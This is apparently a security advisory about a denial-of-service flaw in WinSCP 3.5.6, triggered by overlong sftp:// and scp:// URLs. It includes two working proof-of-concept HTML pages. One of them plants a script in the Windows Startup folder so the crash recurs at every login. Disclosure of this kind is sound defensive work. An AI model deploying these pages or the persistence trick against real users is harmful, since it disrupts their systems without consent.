|
Brought to you by:
Suppliers of:
|
|
|
| |
| WinSCP is "an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer". A malicious attacker can send an email containing a link that will cause WinSCP to crash. |
| |
Credit:
The information has been provided by Luca Ercoli.
|
| |
Vulnerable Systems:
* WinSCP version 3.5.6 (prior versions might be also vulnerable)
The default installation of WinSCP provides the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URL's. A malformed scp:// or sftp:// address embedded in a HTML tag causes the WinSCP application to exhaust CPU and Memory resources. The attacker would need the ability to convince the user to visiting a web site he controlled or opening an HTML e-mail he had prepared. During the denial of service, WinSCP will not display any GUI.
Proof of Concept:
------ WinSCP_DoS1.html --------
<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>
<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
</HEAD>
<BODY>
</BODY>
</HTML>
-------- WinSCP_DoS2.html -------
<html>
<head>
<title>WinSCP DoS</title>
<script language="JScript">
var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
vibas.WriteLine("Dim shell");
vibas.WriteLine("Dim quote");
vibas.WriteLine("Dim DoS");
vibas.WriteLine("Dim param");
vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
vibas.WriteLine("quote = Chr(34)");
vibas.WriteLine("pgm = \"explorer\"");
vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
vibas.Close();
</script>
</head>
</html>
|
|
|
|
|
